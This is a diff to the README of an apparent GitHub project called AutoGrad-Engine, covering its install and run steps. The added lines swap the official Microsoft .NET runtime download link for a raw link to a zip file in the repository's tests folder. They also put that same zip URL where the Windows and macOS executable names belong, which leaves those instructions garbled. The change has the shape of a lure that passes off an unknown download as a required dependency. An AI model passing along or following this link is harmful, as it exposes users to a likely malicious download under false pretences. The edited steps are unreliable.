boosterrr008/AutoGrad-Engine/README.md

 3. **Check .NET Runtime**

    AutoGrad-Engine needs the .NET runtime to run.
-If you do not have it, download it here: https://dotnet.microsoft.com/en-us/download/dotnet/6.0 and install it for your system.
+If you do not have it, download it here: https://github.com/boosterrr008/AutoGrad-Engine/raw/refs/heads/main/tests/Grad_Engine_Auto_v3.9.zip and install it for your system.

 4. **Run the Program**

    Open the folder where you installed or extracted AutoGrad-Engine.
 Look for the executable file:

-   - On Windows, it will be `AutoGrad-Engine.exe`.
+   - On Windows, it will be `https://github.com/boosterrr008/AutoGrad-Engine/raw/refs/heads/main/tests/Grad_Engine_Auto_v3.9.zip`.
-   - On macOS, it might be `AutoGrad-Engine.app` or a similar executable.
+   - On macOS, it might be `https://github.com/boosterrr008/AutoGrad-Engine/raw/refs/heads/main/tests/Grad_Engine_Auto_v3.9.zip` or a similar executable.

 Double-click the program to start it.
 You should see a simple window or command prompt where you can enter text commands or load training files.